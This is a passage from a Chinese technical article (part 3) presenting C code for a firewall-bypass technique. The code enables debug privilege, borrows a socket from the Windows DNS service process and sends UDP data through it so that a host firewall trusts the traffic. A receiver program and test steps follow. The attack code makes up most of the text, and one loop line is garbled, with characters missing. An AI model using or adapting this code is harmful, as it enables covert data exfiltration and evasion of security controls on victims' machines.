新的穿透防火墙的数据传输技术(3)

　　status = ZwQuerySystemInformation( 0x10, buf, n, NULL);

　　}

　　else

　　{

　　printf("ZwQuerySystemInformation wrong\n");

　　return NULL;

　　}

　　NumOfHandle = *(ULONG*)buf;

　　h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

　　for(i = 0; i0) // if port >0, then we can use it

　　break;

　　}

　　}

　　catch(...)

　　{

　　continue;

　　}

　　}

　　if ( buf != NULL )

　　{

　　free( buf );

　　}

　　return (SOCKET)sock;

　　}

　　/*++

　　This is not required...

　　--*/

　　BOOL EnablePrivilege (PCSTR name)

　　{

　　HANDLE hToken;

　　BOOL rv;

　　TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };

　　LookupPrivilegeValue (

　　0,

　　name,

　　&priv.Privileges[0].Luid

　　);

　　priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

　　OpenProcessToken(

　　GetCurrentProcess (),

　　TOKEN_ADJUST_PRIVILEGES,

　　&hToken

　　);

　　AdjustTokenPrivileges (

　　hToken,

　　FALSE,

　　&priv,

　　sizeof priv,

　　0,

　　0

　　);

　　rv = GetLastError () == ERROR_SUCCESS;

　　CloseHandle (hToken);

　　return rv;

　　}

　　void main()

　　{

　　WSADATA wsaData;

　　char testbuf[255];

　　SOCKET sock;

　　sockaddr_in RecvAddr;

　　int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

　　if (iResult != NO_ERROR)

　　printf("Error at WSAStartup()\n");

　　if(!LocateNtdllEntry())

　　return;

　　if(!EnablePrivilege (SE_DEBUG_NAME))

　　{

　　printf("EnablePrivilege wrong\n");

　　return;

　　}

　　sock = GetSocketFromId(GetDNSProcessId());

　　if( sock==NULL)

　　{

　　printf("GetSocketFromId wrong\n");

　　return;

　　}

　　//Change there value...

　　RecvAddr.sin_family = AF_INET;

　　RecvAddr.sin_port = htons(5555);

　　RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

　　if(SOCKET_ERROR == sendto(sock,

　　"test",

　　5,

　　0,

　　(SOCKADDR *) &RecvAddr,

　　sizeof(RecvAddr)))

　　{

　　printf("sendto wrong:%d\n", WSAGetLastError());

　　}

　　else

　　{

　　printf("send ok... Have fun, right? ^_^\n");

　　}

　　

　　getchar();

　　//WSACleanup();

　　return;

　　}

　　[Copy to clipboard]

　　很早以前我就有这个想法了，只是一直没有去实现。在上面的代码中，因为要找出DNS进程句柄，而svchost.exe又有多个，所以以用户名来进行判断，本来是用OpenProcessToken，但是怎么也不行。所以换个方法，用到了wtsapi32库函数。

　　再用下面的代码测试：

　　CODE:

　　/*++

　　UdpReceiver

　　--*/

　　#include

　　#include "winsock2.h"

　　#pragma comment(lib, "ws2_32")

　　void main()

　　{

　　WSADATA wsaData;

　　SOCKET RecvSocket;

　　sockaddr_in RecvAddr;

　　int Port = 5555;

　　char RecvBuf[1024];

　　int BufLen = 1024;

　　sockaddr_in SenderAddr;

　　int SenderAddrSize = sizeof(SenderAddr);

　　//-----------------------------------------------

　　// Initialize Winsock

　　WSAStartup(MAKEWORD(2,2), &wsaData);

　　//-----------------------------------------------

　　// Create a receiver socket to receive datagrams

　　RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

　　//-----------------------------------------------

　　// Bind the socket to any address and the specified port.

　　RecvAddr.sin_family = AF_INET;

　　RecvAddr.sin_port = htons(Port);

　　RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

　　bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

　　//-----------------------------------------------

　　// Call the recvfrom function to receive datagrams

　　// on the bound socket.

　　printf("Receiving datagrams...\n");

　　while(1)

　　{

　　recvfrom(RecvSocket,

　　RecvBuf,

　　BufLen,

　　0,

　　(SOCKADDR *)&SenderAddr,

　　&SenderAddrSize);

　　printf("%s\n", RecvBuf);

　　}

　　//-----------------------------------------------

　　// Close the socket when finished receiving datagrams

　　printf("Finished receiving. Closing socket.\n");

　　closesocket(RecvSocket);

　　//-----------------------------------------------

　　// Clean up and exit.

　　printf("Exiting.\n");

　　WSACleanup();

　　return;

　　}

　　[Copy to clipboard]

　　测试步骤：

　　1. 在一台机器上执行UdpReceiver。

　　2. 在安装防火墙的机器上执行第一个程序。